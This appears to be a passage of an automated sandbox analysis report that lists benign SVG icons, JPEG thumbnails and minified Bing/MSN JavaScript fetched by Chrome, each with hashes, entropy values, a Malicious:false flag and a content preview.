                                                                                                                                                                                                                                                                        Preview:<svg enable-background="new 0 0 64 48" viewBox="0 0 64 48" xmlns="http://www.w3.org/2000/svg"><path d="m59.5.5h-27.5v47h27.5c2.209 0 4-1.791 4-4v-39c0-2.209-1.791-4-4-4z" fill="#111"/><path d="m4.5.5h27.5v47h-27.5c-2.209 0-4-1.791-4-4v-39c0-2.209 1.791-4 4-4z" fill="#fff"/><path d="m4.5.5h55c2.209 0 4 1.791 4 4v39c0 2.209-1.791 4-4 4h-55c-2.209 0-4-1.791-4-4v-39c0-2.209 1.791-4 4-4z" fill="none" stroke="#ccc"/><path d="m14 14h-6c-1.105 0-2-.895-2-2v-4c0-1.105.895-2 2-2h6c1.105 0 2 .895 2 2v4c0 1.105-.895 2-2 2z" fill="#106ebe"/><path d="m34 36h-26c-1.105 0-2-.895-2-2v-14c0-1.105.895-2 2-2h26c1.105 0 2 .895 2 2v14c0 1.105-.895 2-2 2z" fill="#c4c4c4"/><path d="m24 14h29c2.209 0 4-1.791 4-4s-1.791-4-4-4h-29c-2.209 0-4 1.791-4 4s1.791 4 4 4zm31 4h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-47c-1.105 0-2 .895-2 2s.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1111
                                                                                                                                                                                                                                                                        Entropy (8bit):4.61511796141903
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                                                                                                                                                                                        MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                                                                                                                                                                                        SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                                                                                                                                                                                        SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                                                                                                                                                                                        SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="20px" height="16px" viewBox="0 0 20 16" focusable="false" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <g transform="translate(-10, -12)" fill="#007DAA" >.. <path d="M28.125,14.4615385 L25,14.4615385 L24.26875,13.0203077 C23.95125,12.3950769 23.30125,12 22.59125,12 L17.40875,12 C16.69875,12 16.04875,12.3950769 15.73125,13.0203077 L15,14.4615385 L11.875,14.4615385 C10.84,14.4615385 10,15.2886154 10,16.3076923 L10,26.1538462 C10,27.1729231 10.84,28 11.875,28 L28.125,28 C29.16,28 30,27.1729231 30,26.1538462 L30,16.3076923 C30,15.2886154 29.16,14.4615385 28.125,14.4615385 Z M20,25.5384615 C17.23875,25.5384615 15,23.3341538 15,20.6153846 C15,17.8966154 17.23875,15.6923077 20,15.6923077 C22.76125,15.6923077 25,17.8966154 25,20.6153846 C25,23.3341538 22.76125,25.5384615 20,25.5384615 Z M20,18.1538462 C18.62125,18.1538462 17.5,19.2578462 17.5,20.6153846 C17.5,21.9729231 18.62125,23.0769231 20,23.0769231 C21.37875,23.0769231
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                                                        Entropy (8bit):4.5002812368789336
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tBJluJMHMMV709HTMMrgCyDrGpsgsxPSBAs3b0PzlUVZFAHo38xAIUr4zYY3BArF:5/YbysuxPSdupG48ayP
                                                                                                                                                                                                                                                                        MD5:3AC9F8594F02FB302D7C05C7F64C3EA4
                                                                                                                                                                                                                                                                        SHA1:EFEEA55DE6C48BAD79D0AAAE1A954B19D5A14571
                                                                                                                                                                                                                                                                        SHA-256:EEF71DA25F01CC0B83539CECD5320B5717A10F441F82754DA23E6082083A86B9
                                                                                                                                                                                                                                                                        SHA-512:35A42CF8F6B57C95328EBD27A49C9CC0FDD158A329E46C61E3C7C07A218D001A964AF3D66506BFCA889754A0D47742615B731DB3110DBDDB6F3B33594A7AFFF1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="30" height="14" viewBox="0 0 30 14" fill="none" xmlns="http://www.w3.org/2000/svg">.. <g clip-path="url(#clip0_1_504)">.. <path fill-rule="evenodd" clip-rule="evenodd" d="M7.39998 12.8H14.2L17.3 1.20001H7.39998C4.19998 1.20001 1.59998 3.80001 1.59998 7.00001C1.59998 10.2 4.19998 12.8 7.39998 12.8Z" fill="white"/>.. <path fill-rule="evenodd" clip-rule="evenodd" d="M22.6 0H7.40002C3.50002 0 0.400024 3.1 0.400024 7C0.400024 10.9 3.50002 14 7.40002 14H22.6C26.5 14 29.6 10.9 29.6 7C29.6 3.1 26.4 0 22.6 0ZM1.60002 7C1.60002 3.8 4.20002 1.2 7.40002 1.2H17.3L14.2 12.8H7.40002C4.20002 12.8 1.60002 10.2 1.60002 7Z" fill="#0066FF"/>.. <path d="M24.6 4.00001C24.8 4.20001 24.8 4.60001 24.6 4.80001L22.5 7.00001L24.7 9.20001C24.9 9.40001 24.9 9.80001 24.7 10C24.5 10.2 24.1 10.2 23.9 10L21.7 7.80001L19.5 10C19.3 10.2 18.9 10.2 18.7 10C18.5 9.80001 18.5 9.40001 18.7 9.20001L20.8 7.00001L18.6 4.80001C18.4 4.60001 18.4 4.20001 18.6 4.00001C18.8 3.80001 19.2 3.80001 19.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2356
                                                                                                                                                                                                                                                                        Entropy (8bit):7.788530055266728
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8/bxnuERAvS9eAtaN2w1Z7zutSXaUlOBpQdJ3dLCq6yRZ/RSFGHFPG:8zgEP0At3w1Z7z0SXXA+tGqdhIgQ
                                                                                                                                                                                                                                                                        MD5:3545ED1A882A931AE397E94703D788CE
                                                                                                                                                                                                                                                                        SHA1:E99A1DFD963E470A826454C371697414AAD49013
                                                                                                                                                                                                                                                                        SHA-256:0B71FD3B45AC99E1BB3FD3B27C690D9A227BFA2A9162EDCE621D59C73023D0B7
                                                                                                                                                                                                                                                                        SHA-512:2758702A250A46930537E102008EA502CD6C3407D406102735C857CFC915BC6E19FFB519426C9A2088725707D027CB9150CC474F1010F9CA79B5AFF7C0428B8D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_gdhKoZzUo8Q_PwwMTcgCxQ&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........m9.5..h...a..t=..|.......)...KH.....G.PpsM.z.u.e.m.......Mn......$.*..~...\...{......D..........J....x........ ..Ed.6z.h.[.Rj.."k}>.z.|...Y.cX..N.&..C"!.f\...-WFW....o......g..]...>....u\.*0...Wdc.*.W...`..p..|.NjLS....F)1@....&3L.:S...........4..E.ZR>jLT.$?z...E..d.50.:..M.<r=..1KF1E.....u.n/`......^...N.G....A..Ty..8`:s..D...hxs.."6...8.T:T...i..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x304, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1750
                                                                                                                                                                                                                                                                        Entropy (8bit):7.136110936757293
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:fIihitYJ/jWdE2XsQvGYCU1Y72Xdmq50tbrFl20MVq4OSLw:AiH/j0EisV9UNXdfifKf7Lw
                                                                                                                                                                                                                                                                        MD5:9119C1A6EA63AFA55E6274B55B458817
                                                                                                                                                                                                                                                                        SHA1:618102DB60F79261B94845EA3F65895EF6995AFD
                                                                                                                                                                                                                                                                        SHA-256:0FA50A450106430FB653E3EC832D8E0361F08B88FA32FC7A3F8C148755210B9B
                                                                                                                                                                                                                                                                        SHA-512:504E036FF7DDB00E2B784B68EC3C2C01635B003690FB8D6554BA269A65E07BE49D18C47E16328B3817185B6CB55DF2F1B943611F30B44C4DA2408BDE1DA41915
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............0.,.."..........c...............................................!.1..A"..........................................1............?..~.......{.o][...+....@m.=]Q.Zr..cQ.[.GX.r..A.V.q..A.V..V.GiZ..V.....VG.t.=..v=S....+.;.W^l.]yy..>W.LW...O...{.n.V=...]t.N=1[....o..fc.k..>Q....1..=.H...^..~_..>..<.....+7.....42.Z....1....J.k..V.r..Du..rPv..\5.A.a:r.Tw.~N:..G=c..{q..X........#.mu...o;..O..d......~]}1....<...{...].g.^o.....`.=.z.+H...)..=.cL.}[......Y..X.4.....i.ADh.b7".my....M5y..]kX..u.Pt.X.F.....|...zg..>o=..@..\._....S.....k<..`?C}5.g....mz.S....}H.{..s.....1zy..'].(.k.....{c...G..#.ww...:....5....d....LGH..a...r..).&.rGH.J*..du......Q.]s]..0h:i........;.9h5z^zs.../K-z..$|.z..V.=..W.N...c.v...o...M...i.q..A..'.V/[.....iU......Z........+r.kr...k.....*.......... .`............[....
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3102), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3102
                                                                                                                                                                                                                                                                        Entropy (8bit):5.21762849278984
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:wSGAYinlz3omPxexUQn4T4mEWOJXBEmQ4Qbjzu7EG62C5lamlh/uf:w3inJ3rs6DTmfXBq4Ujzu7k9jfK
                                                                                                                                                                                                                                                                        MD5:DD6A528C55708896155FEA98148725FA
                                                                                                                                                                                                                                                                        SHA1:53C48069ABE54FD30D9FFF1D7FD8C287AFBBE1B1
                                                                                                                                                                                                                                                                        SHA-256:635421AF44598C7601907A7AD263A3A8925BE6495BA349382F02805DBE668566
                                                                                                                                                                                                                                                                        SHA-512:B1D3214F238D873708ABDD7DADB4E3C01BFA036B0AA737028E58E9EC5236A6D8600DC0D11628B0E299027ADD8697D60D37443548864D1DB3B25747098BFB1A24
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var MobileIcon;(function(){function wt(){var t,i;tt()?((t=n===null||n===void 0?void 0:n.classList)===null||t===void 0?void 0:t.add("b_hide"),r("overlap")):((i=n===null||n===void 0?void 0:n.classList)===null||i===void 0?void 0:i.remove("b_hide"),Log.Log(b,k,"resize"))}function tt(){return(g===null||g===void 0?void 0:g.offsetWidth)-((e===null||e===void 0?void 0:e.offsetWidth)+(d===null||d===void 0?void 0:d.offsetWidth)+at)<vt}function i(t){var i=_ge("id_mobpopcntr");(n===null||n===void 0?void 0:n.contains(t===null||t===void 0?void 0:t.target))||(i===null||i===void 0?void 0:i.contains(t===null||t===void 0?void 0:t.target))||r("ClickPage")}function ht(t){Log.Log(it,k,t);bt();n===null||n===void 0?void 0:n.classList.add("active");s=!0}function ct(){if(sj_gx){var n=sj_gx();n.onreadystatechange=function(){n.readyState==4&&n.status==200&&(et=!0,sj_appHTML(e,n.responseText),sb_st(function(){ht("ClickMobileIcon")},250))};n.open("GET","/header/mobupsellfly",!0);n.send()}}function bt(){sj_be(_d,"cl
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (46198)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):78250
                                                                                                                                                                                                                                                                        Entropy (8bit):5.5302144997722795
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:aNHzhc0qXvNbXUQk10BG8+woD+XyYepQcRm9cCaaI4Vr4bZdTuXt0PhANRp/gCav:JXvfk1SG8gm9cJhMSCcjXln0c62e/jNu
                                                                                                                                                                                                                                                                        MD5:D0541FEB9CF7EC680838514F33E37017
                                                                                                                                                                                                                                                                        SHA1:F3F20E735269A0E7BDC6382D1FE5FA8A2F60F107
                                                                                                                                                                                                                                                                        SHA-256:04E4AB24531652C560B92BCC9EEB263B4070CF626BD0F9D5D573B2E891FC99BD
                                                                                                                                                                                                                                                                        SHA-512:4847257DAB51038B99D9738F3D9BFB1AFC15B85E1253F4855984DCF187FE9F0D88B1911F8F193D46B5085C694916F154A8EA1A8BCF097D74F2067E75A4B173AD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/social-bar-wc.5c658caca1f1d3a9dea5.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["social-bar-wc"],{95237:function(t,e,o){"use strict";o.r(e),o.d(e,{SocialBarWC:function(){return U},SocialBarWCStyles:function(){return Ft},SocialBarWCTemplate:function(){return Rt},ToolingInfo:function(){return It}});var n,i=o(33940),a=o(89515),s=o(65756),l=o(4456),r=o(77904),c=o(53076),d=o(83227),p=o(56692),u=o(44979),h=o(57839);!function(t){t[t.UpdateSocial=0]="UpdateSocial",t[t.UpdateSocialComment=1]="UpdateSocialComment",t[t.ToggleCommentOverlay=2]="ToggleCommentOverlay",t[t.CommentOverlayVisibilityChanged=3]="CommentOverlayVisibilityChanged",t[t.RenderSocialPopup=4]="RenderSocialPopup"}(n||(n={}));class m{static dispatchEvent(t,e){window.dispatchEvent(new CustomEvent(t,{detail:e}))}static listenEvent(t,e){window.addEventListener(t,(t=>e(t.detail)))}static getEventNameFromType(t){return`SocialCommunicatorEvent-${t.toString()}`}static updateSocial(t){m.dispatchEvent(m.getEventNameFr
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (391), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):391
                                                                                                                                                                                                                                                                        Entropy (8bit):5.184440623275194
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2Qxjl/mLAHPWEaaGRHkj6iLUEkFKgs5qHT:2QC8H+aGRHk+i1kFKgs5qHT
                                                                                                                                                                                                                                                                        MD5:55EC2297C0CF262C5FA9332F97C1B77A
                                                                                                                                                                                                                                                                        SHA1:92640E3D0A7CBE5D47BC8F0F7CC9362E82489D23
                                                                                                                                                                                                                                                                        SHA-256:342C3DD52A8A456F53093671D8D91F7AF5B3299D72D60EDB28E4F506368C6467
                                                                                                                                                                                                                                                                        SHA-512:D070B9C415298A0F25234D1D7EAFB8BAE0D709590D3C806FCEAEC6631FDA37DFFCA40F785C86C4655AA075522E804B79A7843C647F1E98D97CCE599336DD9D59
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/kmQOPQp8vl1HvI8PfMk2LoJInSM.js
                                                                                                                                                                                                                                                                        Preview:(function(){function n(){var n=_ge("id_p"),t,i;n&&(t="",i="",n.dataset?(t=n.dataset.src,i=n.dataset.alt):(t=n.getAttribute("data-src"),i=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=i},n.src=t))}n()})()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):964
                                                                                                                                                                                                                                                                        Entropy (8bit):4.421237058266115
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t741nTY2jmYXhgauOwgXl3gHuWg9cZLzix9QiVCVCTikxQmQ6Nkpgeoo7:dQnkwXhnuOwIlwHuW7nC9QkaUzQm3Nk5
                                                                                                                                                                                                                                                                        MD5:88E3ED3DD7EEE133F73FFB9D36B04B6F
                                                                                                                                                                                                                                                                        SHA1:518B54603727D68665146F987C13F3E7DCDE8D82
                                                                                                                                                                                                                                                                        SHA-256:A39AB0A67C08D907EDDB18741460399232202C26648D676A22AD06E9C1D874CB
                                                                                                                                                                                                                                                                        SHA-512:90FF1284A7FEB9555DFC869644BD5DF8A022AE7873547292D8F6A31BA0808613B6A7F23CB416572ADB298EEE0998E0270B78F41C619D84AB379D0CA9D1D9DA6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16"><g fill="#00809D"><path d="M2.25 0h-1.25c-.263 0-.521.107-.707.293-.186.186-.293.444-.293.707v1.25c0 .552.448 1 1 1s1-.448 1-1v-.25h.25c.552 0 1-.448 1-1s-.448-1-1-1zM1 8.75c.552 0 1-.448 1-1v-1.5c0-.552-.448-1-1-1s-1 .448-1 1v1.5c0 .552.448 1 1 1zM2.25 12h-.25v-.25c0-.552-.448-1-1-1s-1 .448-1 1v1.25c0 .263.107.521.293.707s.444.293.707.293h1.25c.552 0 1-.448 1-1s-.448-1-1-1zM11.75 2h.25v.25c0 .552.448 1 1 1s1-.448 1-1v-1.25c0-.263-.107-.521-.293-.707-.186-.186-.444-.293-.707-.293h-1.25c-.552 0-1 .448-1 1s.448 1 1 1zM6.25 2h1.5c.552 0 1-.448 1-1s-.448-1-1-1h-1.5c-.552 0-1 .448-1 1s.448 1 1 1zM14.5 7h-.5v-.75c0-.552-.448-1-1-1s-1 .448-1 1v.75h-3.5c-.828 0-1.5.671-1.5 1.5v3.5h-.75c-.552 0-1 .448-1 1s.448 1 1 1h.75v.5c0 .828.672 1.5 1.5 1.5h6c.828 0 1.5-.672 1.5-1.5v-6c0-.829-.672-1.5-1.5-1.5z"/></g><path fill="none" d="M0 0h16v16h-16z"/></svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1040
                                                                                                                                                                                                                                                                        Entropy (8bit):4.906475176292464
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t3JfDuJSMMg7cO4PRgASiFL9PddDSYXIzfpMhg4BLy+K5bHxpGlG8O:30cZPRdx3n9vLvK5bHac8O
                                                                                                                                                                                                                                                                        MD5:7EAFCE495848D8F8805487DA7F6C17E8
                                                                                                                                                                                                                                                                        SHA1:D14E7BE4F3BA3860F9292B6E1FE1EE6B432945F6
                                                                                                                                                                                                                                                                        SHA-256:B6F9A9A7FD5FAD7452F972E26119B4A2180E6E28681C4CA77F3D49A9DCB3A151
                                                                                                                                                                                                                                                                        SHA-512:A7D4A78E6C1DC8BAB9B86C099417E1AC2CC6581A7F99780ACCAC2A79F5D5FAEEBA514A61B3BEB34A8BAE6C4B3CC67A8580F4506ABB0817DC7DB3499464827DF3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/staticsb/statics/latest/shopping/discountTag.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.. <path fill-rule="evenodd" clip-rule="evenodd" d="M13.6505 1.15573C13.6203 0.625918 13.191 0.206607 12.6606 0.188891L7.86533 0.0287154C7.57733 0.0190956 7.29857 0.131052 7.09722 0.337199L0.313162 7.28308C-0.0826965 7.68838 -0.0750412 8.33785 0.33026 8.7337L5.39872 13.6841C5.80402 14.0799 6.45349 14.0723 6.84935 13.667L13.6334 6.72108C13.8348 6.51493 13.9401 6.2336 13.9237 5.94591L13.6505 1.15573ZM11.0542 3.19839C11.3347 3.47234 11.7842 3.46704 12.0581 3.18655C12.3321 2.90607 12.3268 2.4566 12.0463 2.18265C11.7658 1.9087 11.3163 1.914 11.0424 2.19449C10.7684 2.47497 10.7737 2.92443 11.0542 3.19839Z" fill="url(#paint0_linear_9629_1325)"/>.. <defs>.. <linearGradient id="paint0_linear_9629_1325" x1="4.94694" y1="13.487" x2="0.000210146" y2="3.39805" gradientUnits="userSpaceOnUse">.. <stop stop-color="#4464FF"/>.. <stop offset="1" stop-color="#44B0FF"/>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6390
                                                                                                                                                                                                                                                                        Entropy (8bit):7.916045846394136
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgENeFGicJL25Ssxv3SEgGTEU4AKiTi2d95qNgmsXhn2:ygVCZ4bvNgVXoTivNgmsXp2
                                                                                                                                                                                                                                                                        MD5:8BD85792846F5BAE63FDC99CA49150FF
                                                                                                                                                                                                                                                                        SHA1:205880EDF6118311758CBDEC786E34BF6C5F2C04
                                                                                                                                                                                                                                                                        SHA-256:6C29760D9B90767B751689DA2ACFBDF12C15C63427CBCB62D7947F78B9C4F85F
                                                                                                                                                                                                                                                                        SHA-512:55E6443EA079230DBF72A81F7B043D9D9EFA5B11B4A502A77CD4243D9BF676845951CBC1F88703E9D3A775F12EFB43DA725CAE349EA844F0AB10B320515B20A7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....8b..'.._'...2.O0H.U.....t.>...".&..e...WL....1.....R%...z.K.......e..6....:.:...V_i...d...v..p..NGo.N.wCP....l..\.:s...^.gt.w....yN....G....i.C),"..s.p..z.......hV.Q.3y"(..z......(.+TZ..z.Y......[.?..JO..D.#J.l...*g.....n.....QN...|C. ..H...Y... *.x.^|...zm.......".$X.....l..}I5..K..k.9......,.....b..Q".....g..-..{..._9...oi.q...Y.D.p...[.J.6...
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2009), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2009
                                                                                                                                                                                                                                                                        Entropy (8bit):5.260635854713912
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:y2x50QNQE0YpOP8AA+nLzpJWM1nzfC57eADCoAILODcv/KUSCUvXG3AP5tD1FiOw:7LpsA0pJdQ7eG2KRSCMg+D1gZV5
                                                                                                                                                                                                                                                                        MD5:601102CA711E0B4140AF45C1657DB13F
                                                                                                                                                                                                                                                                        SHA1:7977EF6E79471380B8787B5B7148E9FF0A74A203
                                                                                                                                                                                                                                                                        SHA-256:E47318CD9D80769AC59E732347FB4F574CD4EEA9E2C787F3A996805265069001
                                                                                                                                                                                                                                                                        SHA-512:082834DC3EC02CF433FBD8D45C7CFDAC1EDF64B90E1198E48EACA4056E98BBE1BCFA8275B4D99BCC0E6934049DC084EEC5D640B54C1933DABB42FA75016E3E40
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/eXfvbnlHE4C4eHtbcUjp_wp0ogM.js
                                                                                                                                                                                                                                                                        Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var h;u=u||r;var s=_ge("id_rh"),e=_ge("rh_animcrcl"),a=_ge("id_rc");if(s&&a&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var o=_ge("rewardsEntryPoint"),v=800,y=r-n,c=Math.min(100,100*(r/u)),l=e&&c>=100&&n<u,p=y>0,w=Date.now();c>=100&&s.classList&&Lib.CssClass.add(s,"rh_reedm");e&&Lib.CssClass.add(e,"anim");h=function(u){var a,k;if(u){var tt=Date.now(),d=tt-w,g=Math.min(d/v,1),it=l?t*g:t*c/100,rt=p?Math.min(Math.floor((n+g*y)/f)*f,r):r,nt=_ge("rewardsBright"),b=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",it.toString()+","+t.toSt
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):226
                                                                                                                                                                                                                                                                        Entropy (8bit):4.923112772413901
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                                                                                                                                                                                        MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                                                                                                                                                                                        SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                                                                                                                                                                                        SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                                                                                                                                                                                        SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/MWgq_OYohQuMsx-qjpxMXsnruVc.js
                                                                                                                                                                                                                                                                        Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
